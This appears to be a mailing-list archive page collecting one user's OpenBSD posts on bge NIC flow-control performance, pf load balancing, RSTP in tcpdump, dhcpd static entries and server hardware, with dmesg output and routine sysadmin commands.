Hi, I'm trying to track down the cause of poor network performance under OpenBSD4.0/i386 on HP Proliants (DL380-G4 and DL360-G4p), which seems to be concerning ethernet 802.3x flow control on the bge NICs. Test topology is: HP DL380-G4 int bge0 (BCM5704C auto at 1000baseT full-duplex) | | int Gig 13/6 (auto at 1000baseT full-duplex) Cisco 6513 chassis + WS-X6548-GE-TX + WS-X6748-GE-TX int Gig 12/47 (auto at 1000baseT full-duplex) | | int bge0 (BCM5704C auto at 1000baseT full-duplex) HP DL360-G4p Test traffic is generated with: On Source: dd if=/dev/zero bs=1k count=1 | nc _peer_ 1234 On Sink:nc -l 1234 > /dev/null With 4.0-release kernel (GENERIC#1107), the bge driver does not negotiate flowcontrol with the switch: switch# show interfaces flowcontrol | inc Port|admin|Gi12/47|Gi13/6 PortSend FlowControl Receive FlowControl RxPause TxPause adminoper adminoper Gi12/47 desired off desired off 0 0 Gi13/6 desired off desired off 0 0 Network traffic is very slow and the receiving host reports significant 'Input errors' on the NIC interface after transfer: source~> netstat -i -I bge0 | grep -e Name -e Link NameMtu Network Address Ipkts IerrsOpkts Oerrs Colls bge0150000:18:fe:32:2e:4a 1050 0 1276 0 0 source~> dd if=/dev/zero bs=1k count=10 | nc _peer_ 1234 10+0 records in 10+0 records out 10240 bytes transferred in 13.219 secs (7746244 bytes/sec) source~> netstat -i -I bge0 | grep -e Name -e Link NameMtu Network Address Ipkts IerrsOpkts Oerrs Colls bge0150000:18:fe:32:2e:4a52684 0 73166 0 0 sink~> netstat -i -I bge0 | grep -e Name -e Link NameMtu Network Address Ipkts IerrsOpkts Oerrs Colls bge0150000:17:a4:45:f5:25 79 0 106 0 0 sink~> nc -l 1234 > /dev/null sink~> netstat -i -I bge0 | grep -e Name -e Link NameMtu Network Address Ipkts IerrsOpkts Oerrs Colls bge0150000:17:a4:45:f5:257084111 50894 0 0 With 4.0-snapshot kernel (GENERIC#1362), the bge driver now negotiates flow control: switch# show interfaces flowcontrol | inc Port|admin|Gi12/47|Gi13/6 PortSend FlowControl Receive FlowControl RxPause TxPause adminoper adminoper Gi12/47 desired on desired on 0 0 Gi13/6 desired on desired on 0 0 However, the transfer is still very slow, and the receiving host still reports significant 'Input errors' on the NIC interface after transfer: source~> netstat -i -I bge0 | grep -e Name -e Link NameMtu Network Address Ipkts IerrsOpkts Oerrs Colls bge0150000:18:fe:32:2e:4a 1459 0 1762 0 0 source~> dd if=/dev/zero bs=1k count=10 | nc _peer_ 1234 10+0 records in 10+0 records out 10240 bytes transferred in 14.120 secs (7251650 bytes/sec) source ~>netstat -i -I bge0 | grep -e Name -e Link NameMtu Network Address Ipkts IerrsOpkts Oerrs Colls bge0150000:18:fe:32:2e:4a53240 0 73457 0 0 sink~> netstat -i -I bge0 | grep -e Name -e Link NameMtu Network Address Ipkts IerrsOpkts Oerrs Colls bge0150000:17:a4:45:f5:25 89 0 98 0 0 sink~> nc -l 1234 > /dev/null sink~> netstat -i -I bge0 | grep -e Name -e Link NameMtu Network Address Ipkts IerrsOpkts Oerrs Colls bge0150000:17:a4:45:f5:2570849 9 51186 0 0 To summarise, it seems as though flow-control is negotiated for both TX & RX in the recent bge driver, but is only functional for TX (if at all). The only relevant source change I can find is: http://www.openbsd.org/cgi-bin/cvsweb/src/sys/dev/pci/if_bge.c.diff? r1=1.202&r2=1.203&f=h "Flow control support for bge(4)/brgphy(4). From brad@ based on code fromNetBSD" with includes the comment /* We can do both TXPAUSE and RXPAUSE. */ Setting 'ifconfig bge0 debug' provides no additional output. I have also repeated the tests with serveral differnet servers, NICs (all bge) and cables and switches to remove faulty device issues. Has anyone an ideas on fixes for this, or how to debug the issue further ? Dmesg below /Pete # dmesg OpenBSD 4.0-current (GENERIC) #1362: Fri Feb 9 14:26:43 MST 2007 [EMAIL PROTECTED]:/usr/src/sys/arch/i386/compile/GENERIC cpu0: Intel(R) Xeon(TM) CPU 3.40GHz ("GenuineIntel" 686-class) 3.41 GHz cpu0: FPU,V86,DE,PSE,TSC,MSR,PAE,MCE,CX8,APIC,SEP,MTRR,PGE,MCA,CMOV,PAT,PSE36, CFLUSH,DS,ACPI,MMX,FXSR,SSE,SSE2,SS,H
Re: Performance problems with bge under OpenBSD4.0/i386
Very Interesting. On the switch I can set the port flow-control to on, off or desirable. The following is the blurb on those configuration options: Gigabit Ethernet Flow Control Keyword Functions, Keywords : Function receive on: The port uses flow control dictated by the neighbor port. receive desired: The port uses flow control if the neighbor port uses it, and does not use flow control if the neighbor port does not use it. receive off: The port does not use flow control, regardless of whether flow control is requested by the neighbor port. send on: The port sends flow-control frames to the neighbor port. send desired: The port sends flow-control frames to the neighbor port if the neighbor port asks to use flow control. send off: The port does not send flow-control frames to the neighbor port. However, irrespective of what I configure the port flow-control to on the switch (and then reboot the OpenBSD host, to be sure of correct interface initialisation) I cannot be ifconfig to report {tx|rx}pause. Is this likely to be a driver problem, or is there some broken flash code on the bge NIC (which I could possible update) ? /Pete On 14. feb. 2007, at 22.42, Mark Kettenis wrote: From: Pete Vickers <[EMAIL PROTECTED]> Date: Wed, 14 Feb 2007 13:33:25 +0100 # ifconfig bge0 bge0: flags=8843 mtu 1500 lladdr 00:17:a4:45:f5:25 groups: egress media: Ethernet autoselect (1000baseT full-duplex) status: active inet6 fe80::217:a4ff:fe45:f525%bge0 prefixlen 64 scopeid 0x1 inet x.x.x.x netmask 0xff00 broadcast x.x.x.x This suggests flow control has *not* been negotiated. With msk(4), I get: borodin$ ifconfig msk0 msk0: flags=8843 mtu 1500 lladdr 00:16:cb:a2:87:67 groups: egress media: Ethernet autoselect (1000baseT full- duplex,rxpause,txpause) status: active inet6 fe80::216:cbff:fea2:8767%msk0 prefixlen 64 scopeid 0x1 inet 192.168.0.17 netmask 0xff00 broadcast 192.168.0.255
Re: FTP-Proxy
On 20. sep. 2006, at 10.22, Alan Smith wrote: *> or a machine with dual nics - one inside and one outside the firewall. * *Rod Dorman wrote: *This is effectively getting rid of the PIX! * *If its got both an inside and outside interface it can be configured as *a gateway such that any inside host can get outside completely bypassing *the PIX. Are you sure your network admins are OK with that? Ok - never write tehnical mails after 14 hours on a plane - they make no sense!!! In a nutshell, I need to know if I can use ftp- proxy on a machine inside our current PIX firewall. If it will only run on a machine running PF acting as the main firewall/gateway then I'm out of luck. I will not be using it if the only way would be a nic inside and outside of the firewall. Sorry for the confusion (and thanks for the reply Rod) Alan Hi, A few thoughts for you to explore: 1. A good number of web browsers etc support authenticated ftp 'upload' via a proxy (e.g. squid), thus fixing your problem - googling direct you on this... 2. if you can put an openbsd box on the inside of the PIX, and make the client traffic go via it (e.g. their default gateway), then you can use the ftp-proxy. 3. recent PIXen support WCCP2 protocol, as does squid (i believe it's just a GRE tunnel basically), so maybe you could run squid on openbsd to direct traffic appropriately, once redirect from the PIX. food for thought anyway /Pete
rndc/named automatic key generation
Following OpenBSD's automatic generation of ssh and isakmp keys, prehaps the following would be a worthwhile addition to /etc/rc to generate a key/config for rndc/named. == if [ ! -f /etc/rndc.conf ]; then echo -n "rndc-confgen: generating new RNDC key... " if /usr/sbin/rndc-confgen | tee /etc/rndc.conf \ | grep '^# [^SEU]' >> /var/named/etc/named.conf; then chown root:named /etc/rndc.conf /var/named/etc/ rndc.conf chmod 640 /etc/rndc.conf /var/named/etc/rndc.conf echo done. else echo failed. fi fi == Notes: 1. I stopped short of piping through a "sed '/^#//'" so that it still remains disabled by default. 2. I guess there is a better way than the late chown/chmod calls, but I guess it's ok, since we are still pre-login during rc. /Pete
Re: rndc/named automatic key generation
On 28. sep. 2006, at 02.30, Spruell, Darren-Perot wrote: From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED] Following OpenBSD's automatic generation of ssh and isakmp keys, prehaps the following would be a worthwhile addition to /etc/rc to generate a key/config for rndc/named. /etc/rc already handles that during named startup. DS Ahh, yep, should have read through the rest of /etc/rc before posting... While I'm there though, is there any reason (other than historical) for the following to anomalies: - the installer script turns sshd on in /etc/rc.conf rather than /etc/ rc.conf.local - the installer script's line for ntpd in /etc/rc.conf.local doesn't use "" like all the example's in /etc/rc if it's just a matter of diffs, I'm more than willing to try and submit them... /Pete
bge problems on HP DL360 G4p with -current
Hi, I'm running an OpenBSD/i386 recent snapshot on a few 'HP DL360 G4p's, all seems good apart from the first NIC (bge0) will not see the LAN. An 'ifconfig bge0' output cycles between "media: Ethernet autoselect (none)" and "media: Ethernet autoselect (loopback)", with "status: no carrier" and will not connect to the LAN. However if I relocate the cable to bge1 then it connects perfectly and 'ifconfig bge1' shows "media: Ethernet autoselect (1000baseT full- duplex)" and "status: active". I've tried 5 identical machines, with different switch ports and cables, and behaviour is consistent: bge0 always fails, and bge1 always works. I've also tried moving the NICs from IRQ 7 to IRQ5, (they are forced to use same IRQ) in the BIOS without effect. Thus I'm pretty sure the problem is not switch, cabling or server hardware. Adding the debug flag on bge0 reveals nothing in logs. In the short term I can run on just bge1, but I'm hoping to do NIC/ switch redundancy via trunk(4) so I'll need bge0. Any suggestions greatly recieved. Full dmesg below. thanks, /Pete [EMAIL PROTECTED] ~>cat /var/run/dmesg.boot OpenBSD 4.0-current (GENERIC) #1134: Mon Oct 2 19:44:53 MDT 2006 [EMAIL PROTECTED]:/usr/src/sys/arch/i386/compile/GENERIC cpu0: Intel(R) Xeon(TM) CPU 3.40GHz ("GenuineIntel" 686-class) 3.41 GHz cpu0: FPU,V86,DE,PSE,TSC,MSR,PAE,MCE,CX8,APIC,SEP,MTRR,PGE,MCA,CMOV,PAT,PSE36, CFLUSH,DS,ACPI,MMX,FXSR,SSE,SSE2,SS,HTT,TM,SBF,SSE3,MWAIT,DS- CPL,EST,CNXT-ID,CX16 cpu0: EST: strange msr value 0x112d112d real mem = 2147000320 (2096680K) avail mem = 1950441472 (1904728K) using 4256 buffers containing 107454464 bytes (104936K) of memory mainbus0 (root) bios0 at mainbus0: AT/286+(00) BIOS, date 12/31/99, BIOS32 rev. 0 @ 0xf, SMBIOS rev. 2.3 @ 0xec000 (73 entries) bios0: HP ProLiant DL360 G4p pcibios0 at bios0: rev 2.1 @ 0xf/0x2000 pcibios0: PCI BIOS has 7 Interrupt Routing table entries pcibios0: PCI Interrupt Router at 000:31:0 ("Intel 6300ESB LPC" rev 0x00) pcibios0: PCI bus #13 is the last bus bios0: ROM list: 0xc/0x8000 0xc8000/0x4000! 0xee000/0x2000! cpu0 at mainbus0 pci0 at mainbus0 bus 0: configuration mode 1 (no bios) pchb0 at pci0 dev 0 function 0 "Intel E7520 MCH" rev 0x0c ppb0 at pci0 dev 2 function 0 "Intel MCH PCIE" rev 0x0c pci1 at ppb0 bus 13 ppb1 at pci0 dev 4 function 0 "Intel MCH PCIE" rev 0x0c pci2 at ppb1 bus 6 ppb2 at pci2 dev 0 function 0 "Intel PCIE-PCIE" rev 0x09 pci3 at ppb2 bus 7 ppb3 at pci2 dev 0 function 2 "Intel PCIE-PCIE" rev 0x09 pci4 at ppb3 bus 10 ppb4 at pci0 dev 6 function 0 "Intel MCH PCIE" rev 0x0c pci5 at ppb4 bus 3 ppb5 at pci0 dev 28 function 0 "Intel 6300ESB PCIX" rev 0x02 pci6 at ppb5 bus 2 ciss0 at pci6 dev 1 function 0 "Compaq Smart Array 64xx" rev 0x01: irq 7 ciss0: 1 LD, HW rev 1, FW 2.68/2.68 scsibus0 at ciss0: 1 targets sd0 at scsibus0 targ 0 lun 0: SCSI0 0/ direct fixed sd0: 140006MB, 140006 cyl, 64 head, 32 sec, 512 bytes/sec, 286734240 sec total bge0 at pci6 dev 2 function 0 "Broadcom BCM5704C" rev 0x10, BCM5704 B0 (0x2100): irq 7, address 00:18:fe:32:1e:08 brgphy0 at bge0 phy 1: BCM5704 10/100/1000baseT PHY, rev. 0 bge1 at pci6 dev 2 function 1 "Broadcom BCM5704C" rev 0x10, BCM5704 B0 (0x2100): irq 7, address 00:18:fe:32:1e:07 brgphy1 at bge1 phy 1: BCM5704 10/100/1000baseT PHY, rev. 0 uhci0 at pci0 dev 29 function 0 "Intel 6300ESB USB" rev 0x02: irq 5 usb0 at uhci0: USB revision 1.0 uhub0 at usb0 uhub0: Intel UHCI root hub, rev 1.00/1.00, addr 1 uhub0: 2 ports with 2 removable, self powered uhci1 at pci0 dev 29 function 1 "Intel 6300ESB USB" rev 0x02: irq 5 usb1 at uhci1: USB revision 1.0 uhub1 at usb1 uhub1: Intel UHCI root hub, rev 1.00/1.00, addr 1 uhub1: 2 ports with 2 removable, self powered "Intel 6300ESB WDT" rev 0x02 at pci0 dev 29 function 4 not configured "Intel 6300ESB APIC" rev 0x02 at pci0 dev 29 function 5 not configured ehci0 at pci0 dev 29 function 7 "Intel 6300ESB USB" rev 0x02: irq 7 usb2 at ehci0: USB revision 2.0 uhub2 at usb2 uhub2: Intel EHCI root hub, rev 2.00/1.00, addr 1 uhub2: 4 ports with 4 removable, self powered ppb6 at pci0 dev 30 function 0 "Intel 82801BA AGP" rev 0x0a pci7 at ppb6 bus 1 vga1 at pci7 dev 3 function 0 "ATI Rage XL" rev 0x27 wsdisplay0 at vga1 mux 1: console (80x25, vt100 emulation) wsdisplay0: screen 1-5 added (80x25, vt100 emulation) "Compaq iLO" rev 0x01 at pci7 dev 4 function 0 not configured "Compaq iLO" rev 0x01 at pci7 dev 4 function 2 not configured ichpcib0 at pci0 dev 31 function 0 "Intel 6300ESB LPC" rev 0x02 pciide0 at pci0 dev 31 function 1 "Intel 6300ESB IDE" rev 0x02: DMA, channel 0 configured t
Re: pf load balancing and failover
Hi, If I recall correctly, slbd adds new rules to pf for each incoming tcp session. Since I couldn't get it to work (old version) I do not know what the session and Sources tables will look like, but I suspect there will be no problems with them in slbd. Client-server association is maintained by slbd and implemented with separate rules for each tcp session. This seems a bit ineffective and rather pointless since pf has the load balancing functionality built in. The problems with using pf and a health checking script is related to removal of failed backends. There are two separate issues: 1) When using sticky-address in the rdr rules client-server associations are added to the internal Sources table. It is impossible to remove entries for a single backend from this table. If a backend fails and is removed from the rdr destination table this table will have to be flushed, making all clients end up on new backends, wich is unacceptable in many configurations. If this table is not cleared then the rdr destination table is not inspected for client IP's found in the Sources table. These clients will still be sent to the failed and removed backend. Preferably entries could be removed from this table based on source-IP and backend-IP:backend-port, and maybe even the virtual service IP:port or a pf rule number. 2) TCP sessions to a failed backend will continue to exist after the backend is removed from the rdr destination table. As of today these sessions can be removed with pfctl by specifying the source and destination IP addresses. Since different services can run on differerent port numbers on the same machines it should be possible to specify a destination port number as well. I guess that if a backend dies then the client is notified about this just as if it had been speaking directly to the backend, so it might not be necessary to clean out these sessions at all, and maybe even the tcpdrop tool will do the trick? Anyway, main issue is with removing single sessions from the internal Sources table (as it is called in pfctl(8)). /Pete On 22. okt. 2006, at 21.13, Kevin Reay wrote: On 10/22/06, Per-Olov Sjvholm <[EMAIL PROTECTED]> wrote: Hi again I am looking at the CVS. I can't see its possible to out of the box remove addresses from a round robin scheme in PF against a faulty web server. Am I missing something? But I maybe misunderstood Kevin Reay that in this thread said: "and it would automatically remove the address from a pf poll (and optionality run a command) when a host failed.". Maybe I have to do some scripting after all... It can be a little confusing at first, but it makes a lot of sense once you understand it. The way I remember it, a person creates a config file for slbd that defines the various pools and their polling methods, and slbd creates the load balancing pools in pf at start-up automatically (in an anchored ruleset). Then it removes entries from those pools when a server goes down. So... no scripting required. Of course, Bill Marquette will probably have more knowledge/details about this then me... Kevin
Re: pf load balancing and failover
Hi Per-Olav, If you are dealing with http based services, rather than generic tcp, then you could take a look at 'pound'. I did a port of it a while back, and use it in pretty large scale environment here, it supports sticky backend etc. Works well for me, YMMV. http://marc.theaimsgroup.com/?l=openbsd-ports&m=115513682623098 /Pete On 26. okt. 2006, at 23.26, Per-Olov Sjvholm wrote: On Thursday 26 October 2006 22:28, Kevin Reay wrote: Hey, On 10/26/06, Pete Vickers <[EMAIL PROTECTED]> wrote: If I recall correctly, You don't. :o) slbd adds new rules to pf for each incoming tcp session. Since I couldn't get it to work (old version) I do not know what the session and Sources tables will look like, but I suspect there will be no problems with them in slbd. Client-server association is maintained by slbd and implemented with separate rules for each tcp session. slbd doesn't maintain separate rules for each tcp session. Client- server association is NOT maintained by slbd. This seems a bit ineffective and rather pointless since pf has the load balancing functionality built in. Which slbd relies on. Slbd just inserts the load balancing rules into pf based on it's own config. Then it does the job of health-checking the servers listed in it's config file, and removing them from the server list if they go down. The problems with using pf and a health checking script is related to removal of failed backends. There are two separate issues: 1) When using sticky-address in the rdr rules client-server associations are added to the internal Sources table. It is impossible to remove entries for a single backend from this table. If a backend fails and is removed from the rdr destination table this table will have to be flushed, making all clients end up on new backends, wich is unacceptable in many configurations. If this table is not cleared then the rdr destination table is not inspected for client IP's found in the Sources table. These clients will still be sent to the failed and removed backend. Preferably entries could be removed from this table based on source-IP and backend-IP:backend-port, and maybe even the virtual service IP:port or a pf rule number. Which is what slbd avoids. slbd doesn't use sticky-address for this reason. slbd seems mostly geared for web servers where the web application is written well enough to not need each request to go back to the same server. Kevin Hi Kevin I can come up with 100 reasons for using the same web target server over a whole session and very few for not doing it. Can't see we can use slbd for the ordering system as intended if requests goes to just any server in the pool. Or did I miss anything? Regards /Per-Olov
Re: pf load balancing and failover
Hi Berk, I'm really intereted in this. I have a load of legacy tcp session based load balancing with I'd love to migrate to an OpenBSD/pf based solution. Do you have a patch with applies cleanly to 4.0 ? /Pete On 26. okt. 2006, at 22.16, Berk D. Demir wrote: Pete Vickers wrote: 1) When using sticky-address in the rdr rules client-server associations are added to the internal Sources table. It is impossible to remove entries for a single backend from this table. If a backend fails and is removed from the rdr destination table this table will have to be flushed, making all clients end up on new backends, wich is unacceptable in many configurations. If this table is not cleared then the rdr destination table is not inspected for client IP's found in the Sources table. These clients will still be sent to the failed and removed backend. Preferably entries could be removed from this table based on source-IP and backend-IP:backend-port, and maybe even the virtual service IP:port or a pf rule number. 2) TCP sessions to a failed backend will continue to exist after the backend is removed from the rdr destination table. As of today these sessions can be removed with pfctl by specifying the source and destination IP addresses. Since different services can run on differerent port numbers on the same machines it should be possible to specify a destination port number as well. I guess that if a backend dies then the client is notified about this just as if it had been speaking directly to the backend, so it might not be necessary to clean out these sessions at all, and maybe even the tcpdrop tool will do the trick? Anyway, main issue is with removing single sessions from the internal Sources table (as it is called in pfctl(8)). I've submitted a patch, adding a new ioctl to pf and an implementation to clear src-track entries likewise states (-k 1.1.1.1 -k 2.3.5.0/23). A patched build (smt. between 4.0 and -current) is running in many DCs in my county right now. pfctl.c changed after my submission. I have to fix the patches and post here in case it helps. It needs to get OKs from developers to get into the tree. Last touch with a developer about this patch was with dhartmei on Jul 25. (I'll post it tomorrow)
Re: bridge(4) RSTP
Hi, A nice start could be to teach our tcpdump about RSTP. At present it just pukes: 20:30:14.196199 802.1d unknown protocol ver(0x2) /Pete On 27. okt. 2006, at 13.35, Stuart Henderson wrote: FreeBSD have early support for rapid STP in bridge(4): http://lists.freebsd.org/pipermail/freebsd-current/2006-October/ 066535.html http://people.freebsd.org/~thompsa/bridge_rstp.20061012.diff I'll try and look at it sometime, but knowing how far I got last time I tried porting any kernel code (not very...and they have made quite a few changes to bridge(4) since importing it via NetBSD last year) I thought it may be worth drawing attention to here in case anyone else is interested.
Re: bridge(4) RSTP
Hi, Patch applies cleanly and appears to work great: [EMAIL PROTECTED] ~> tcpdump -i bge1 stp tcpdump: listening on bge1, link-type EN10MB 15:25:02.061139 802.1d RSTP config flags=0x3c root=6011.0:18:74:61:e5:40 rootcost=0x0 bridge=6011.0:18:74:61:e5:40 port=0x8630 age=0/0 max=20/0 hello=2/0 fwdelay=15/0 I'm not coders either so I can't review your patch's quality, but would be good to get it verified & in the tree. thanks. /Pete On 29. okt. 2006, at 14.15, Stuart Henderson wrote: On 2006/10/27 14:03, Pete Vickers wrote: A nice start could be to teach our tcpdump about RSTP. At present it just pukes: something like this? (coding style probably sucks, but I'm no coder :) Index: print-stp.c === RCS file: /data/cvsroot/OpenBSD/src/usr.sbin/tcpdump/print-stp.c,v retrieving revision 1.4 diff -u -r1.4 print-stp.c
subversion with mod_dav_svn
Hi, Anybody got subversion running well under OpenBSD with the http/ webdav transport ? It seems to require apache2 amongst a whole shed load of other dependancies. Google throws up nothing less than 4 years old, so really just after any experiences to shortcut my legwork. thanks /Pete
Re: PCI-X not seen by 3.8 on HP DL-145 G2
On 9. des. 2005, at 10.01, Srebrenko Sehic wrote: 2) DL145 (G2), SATA/nForce4 = works, but the disk is slow and the CPU spends 100% of time in kernel with heavy disk activity. (tested on i386/3.8-STABLE) for my DL145 (pretty new) I get a reasonable-ish disk I/O of ~60Mb/s ( with CPU at 99% idle) [EMAIL PROTECTED] /root> dd if=/dev/rwd0a of=/dev/null bs=1m count=1000 1000+0 records in 1000+0 records out 1048576000 bytes transferred in 17.645 secs (59423434 bytes/sec) [EMAIL PROTECTED] /root> ... since it's a 2xAMD64 CPU box I'm running amd64 GENERIC.MP (- current), the only problem I experienced was crashing on boot with ipmi. once that was disabled, all is fine) (you wouldn't believe how fast this thing chews through the key gen on first boot :-) [EMAIL PROTECTED] /root> cat /var/run/dmesg.boot OpenBSD 3.8-current (GENERIC.MP) #0: Wed Nov 30 01:23:39 CET 2005 [EMAIL PROTECTED]:/usr/src/sys/arch/amd64/compile/GENERIC.MP real mem = 2146140160 (2095840K) avail mem = 1835208704 (1792196K) using 22937 buffers containing 214822912 bytes (209788K) of memory mainbus0 (root) ipmi at mainbus0 not configured mainbus0: Intel MP Specification (Version 1.4) (AMD HAMMER ) cpu0 at mainbus0: apid 0 (boot processor) cpu0: AMD Opteron(tm) Processor 252, 2612.35 MHz cpu0: FPU,VME,DE,PSE,TSC,MSR,PAE,MCE,CX8,APIC,SEP,MTRR,PGE,MCA,CMOV,PAT,PSE36, CFLUSH,MMX,FXSR,SSE,SSE2,SSE3,NXE,MMXX,FFXSR,LONG,3DNOW2,3DNOW cpu0: 64KB 64b/line 2-way I-cache, 64KB 64b/line 2-way D-cache, 1MB 64b/line 16-way L2 cache cpu0: ITLB 32 4KB entries fully associative, 8 4MB entries fully associative cpu0: DTLB 32 4KB entries fully associative, 8 4MB entries fully associative cpu0: apic clock running at 200925952Hz cpu1 at mainbus0: apid 1 (application processor) cpu1: AMD Opteron(tm) Processor 252, 2612.04 MHz cpu1: FPU,VME,DE,PSE,TSC,MSR,PAE,MCE,CX8,APIC,SEP,MTRR,PGE,MCA,CMOV,PAT,PSE36, CFLUSH,MMX,FXSR,SSE,SSE2,SSE3,NXE,MMXX,FFXSR,LONG,3DNOW2,3DNOW cpu1: 64KB 64b/line 2-way I-cache, 64KB 64b/line 2-way D-cache, 1MB 64b/line 16-way L2 cache cpu1: ITLB 32 4KB entries fully associative, 8 4MB entries fully associative cpu1: DTLB 32 4KB entries fully associative, 8 4MB entries fully associative mpbios: bus 0 is type PCI mpbios: bus 1 is type PCI mpbios: bus 2 is type PCI mpbios: bus 3 is type PCI mpbios: bus 4 is type PCI mpbios: bus 128 is type PCI mpbios: bus 129 is type PCI mpbios: bus 134 is type PCI mpbios: bus 139 is type ISA ioapic0 at mainbus0 apid 2: pa 0x8373cf24, version 11, 24 pins ioapic1 at mainbus0 apid 3: pa 0x8373ce24, version 11, 7 pins ioapic2 at mainbus0 apid 4: pa 0x8373cc24, version 11, 7 pins pci0 at mainbus0 bus 0: configuration mode 1 "Nvidia nForce4 DDR" rev 0xa3 at pci0 dev 0 function 0 not configured pcib0 at pci0 dev 1 function 0 "Nvidia nForce4 ISA" rev 0xa3 "Nvidia nForce4 SMBus" rev 0xa2 at pci0 dev 1 function 1 not configured ohci0 at pci0 dev 2 function 0 "Nvidia nForce4 USB" rev 0xa2: apic 2 int 10 (irq 10), version 1.0, legacy support usb0 at ohci0: USB revision 1.0 uhub0 at usb0 uhub0: Nvidia OHCI root hub, rev 1.00/1.00, addr 1 uhub0: 4 ports with 4 removable, self powered ehci0 at pci0 dev 2 function 1 "Nvidia nForce4 USB" rev 0xa3: apic 2 int 11 (irq 11) ehci0: timed out waiting for BIOS usb1 at ehci0: USB revision 2.0 uhub1 at usb1 uhub1: Nvidia EHCI root hub, rev 2.00/1.00, addr 1 uhub1: 4 ports with 4 removable, self powered pciide0 at pci0 dev 6 function 0 "Nvidia nForce4 IDE" rev 0xa2: DMA, channel 0 configured to compatibility, channel 1 configured to compatibility pciide0: channel 0 disabled (no drives) pciide0: channel 1 disabled (no drives) pciide1 at pci0 dev 8 function 0 "Nvidia nForce4 SATA 2" rev 0xa3: DMA pciide1: using apic 2 int 10 (irq 10) for native-PCI interrupt wd0 at pciide1 channel 0 drive 0: wd0: 16-sector PIO, LBA48, 76319MB, 156301488 sectors wd0(pciide1:0:0): using PIO mode 4, Ultra-DMA mode 5 wd1 at pciide1 channel 1 drive 0: wd1: 16-sector PIO, LBA48, 238475MB, 488397168 sectors wd1(pciide1:1:0): using PIO mode 4, Ultra-DMA mode 5 ppb0 at pci0 dev 9 function 0 "Nvidia nForce4 PCI-PCI" rev 0xa2 pci1 at ppb0 bus 1 vga1 at pci1 dev 5 function 0 "Nvidia GeForce2 MX" rev 0xb2 wsdisplay0 at vga1 mux 1: console (80x25, vt100 emulation) wsdisplay0: screen 1-5 added (80x25, vt100 emulation) ppb1 at pci0 dev 12 function 0 "Nvidia nForce4 PCIE" rev 0xa3 pci2 at ppb1 bus 2 bge0 at pci2 dev 0 function 0 "Broadcom BCM5721" rev 0x11, BCM5750 B1 (0x4101): apic 2 int 11 (irq 11), address 00:15:60:5f:93:49 brgphy0 at bge0 phy 1: BCM5750 10/100/1000baseT PHY, rev. 0 ppb2 at pci0 dev 13 function 0 "Nvidia nForce4 PCIE" rev 0xa3 pci3 at ppb2 bus 3 bge1 at pci3 dev 0 function 0 "Broadcom BCM5721" rev 0x11, BCM5750 B1 (0x4101): apic 2 int 10 (irq 10), address 00:15:60:5f:93:48 brgphy1 at bge1 phy 1: BCM5750 10/100/1000baseT PHY, rev. 0 ppb3 at pci0 dev 14 function 0 "Nvidia nForce4 PCIE" rev 0xa3 pci4 at ppb3 bu
Re: PCI-X not seen by 3.8 on HP DL-145 G2
On 9. des. 2005, at 11.33, Srebrenko Sehic wrote: On 12/9/05, Pete Vickers <[EMAIL PROTECTED]> wrote: for my DL145 (pretty new) I get a reasonable-ish disk I/O of ~60Mb/s ( with CPU at 99% idle) [EMAIL PROTECTED] /root> dd if=/dev/rwd0a of=/dev/null bs=1m count=1000 1000+0 records in 1000+0 records out 1048576000 bytes transferred in 17.645 secs (59423434 bytes/sec) [EMAIL PROTECTED] /root> Try testing read/write into files instead of raw device. Also, try with smaller block sizes. I bet you will see different results. yeah, this is pretty poor but consistent ( but cpu use is still negligible): [EMAIL PROTECTED] /tmp> dd if=/dev/zero of=junk.data bs=1m count=500 500+0 records in 500+0 records out 524288000 bytes transferred in 68.774 secs (7623327 bytes/sec) [EMAIL PROTECTED] /tmp> [EMAIL PROTECTED] /tmp> dd if=/dev/zero of=junk.data bs=512k count=1000 1000+0 records in 1000+0 records out 524288000 bytes transferred in 68.576 secs (7645311 bytes/sec) [EMAIL PROTECTED] /tmp>
LSI 300-8x problems
Hi all, Having read the list archives, the decision was made to get a 300-8x for a new server I'm putting together. However, I'm having 2 distinct problems. First of all, the card is only detected when pcibios is disabled. The second being that during the installation process, the disklabels are written, but the install then "hangs" just after asking for confirmation to delete all data on the paritions. If left for a while, "ami0: timeout ccb 126" is printed several times. This has been tried both with the original firmware (LSI_FW_813F) and with the latest firmware (LSI_FW_813J). There is a slew of dmesgs available (see the links below); with the new and old firmware, and with and without pcibios enabled. The motherboard is an Intel 925 chipset part. Motherboard information: http://www.intel.com/design/servers/boards/SE7221BK1-E/index.htm Dmesgs: http://midworld.co.uk/~dmesg/ Basically, has anyone got any ideas of how to get this thing working? Thanks for any help Pete
Re: dhcpd and static entries
On 12. des. 2005, at 21.22, Peter Hessler wrote: This is with -current dhcpd within the last month. On Mon, 12 Dec 2005 12:15:37 -0800 Peter Hessler <[EMAIL PROTECTED]> wrote: : I have a dhcp'd network, with static entries for a ton of machines. : The problem is that the range is for .10 - .254, and the static : entries are scattered throughout. When a random client requests an : address, dhcpd will give out a staticly defined entry. So when the : static entry machine comes back, the two machines fight each other : for the address. : : Moving the static entries to outside the range is unfeasable right : now. And it doesn't address the issue of 'machine was on a different : dhcp network with an address that happens to be staticly defined on : ours'. : : Why does dhcpd give out addresses that are currently in use, and why : does it give out staticly defined addresses? Shouldn't it remove the : static entries from the dynamic pool? : : : Sanitized portions of config: : : shared-network LOCAL-NET { : option domain-name "example.com"; : option domain-name-servers 10.0.0.1; : : option nis-domain "example.nis"; : option nis-servers nis.example.com; : option ntp-servers ntp.example.com; : option time-offset -28800; # PST : : subnet 10.0.0.0 netmask 255.255.255.0 { : option routers 10.0.0.1; : : range 10.0.0.10 10.0.0.254; : } : : group { : use-host-decl-names on; : # host1.example.com 10.0.0.15 :host host1.example.com { hardware ethernet \ : 00:0f:1f:f7:7d:64; fixed-address host1.example.com; } : # host2.example.com 10.0.0.20 : host host2.example.com { hardware ethernet \ : 02:A0:98:01:F5:B4; fixed-address host2.example.com; } : # host3.example.com 10.0.0.29 : host host3.example.com { hardware ethernet \ : 00:0F:1F:F7:78:B6; fixed- address host3.example.com; } :} : } : I believe OpenBSD's dhcpd is based on ISC's implementation, in which case: static entries are in the global scope and independent of any pool declaration. The error is one of configuration: you've defined static entries and dynamic pool overlapping = you've told it to use the IP addresses twice. At a pinch, the option ping-check, might help you out if your address space utilisation is not too large. /Pete
Re: Just confirming: no way to do a pf rdr based on hostname?
